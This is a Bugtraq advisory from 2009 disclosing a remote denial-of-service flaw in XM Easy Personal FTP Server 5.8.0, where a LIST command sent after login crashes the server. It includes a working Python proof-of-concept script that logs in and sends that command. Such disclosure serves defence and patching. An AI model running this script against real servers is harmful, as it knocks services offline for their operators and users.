Bugtraq mailing list archives
XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability
From: zhangmc () mail ustc edu cn
Date: 10 Nov 2009 03:07:00 -0000
Date of Discovery: 10-Nov-2009 Credits:zhangmc[at]mail.ustc.edu.cn Vendor: Dxmsoft Affected: XM Easy Personal FTP Server 5.8.0 Earlier versions may also be affected Overview: XM Easy Personal FTP Server is a easy use FTP server Application. Denial of service vulnerability exists in XM Personal FTP Server that causes the application to crash when the "LIST" is sent to FTP server if you do not use "PASV" or "POST" first. Details: XM Easy Personal FTP Server can't handle "LIST" command if you do not use "PASV" or "POST" first.If you have logged on the server successfully,a "LIST" command will lead the ftp server to crash. Severity: High Exploit example: #!/usr/bin/python import socket import sys def Usage(): print ("Usage: ./expl.py <serv_ip> <Username> <password>\n") print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n") if len(sys.argv) <> 4: Usage() sys.exit(1) else: hostname=sys.argv[1] username=sys.argv[2] passwd=sys.argv[3] sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((hostname, 21)) except: print ("Connection error!") sys.exit(1) r=sock.recv(1024) sock.send("user %s\r\n" %username) r=sock.recv(1024) sock.send("pass %s\r\n" %passwd) r=sock.recv(1024) sock.send("LIST\r\n") sock.close() sys.exit(0);
Current thread:
- XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability zhangmc (Nov 10)
- Re: XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability Protek Research Lab (Nov 12)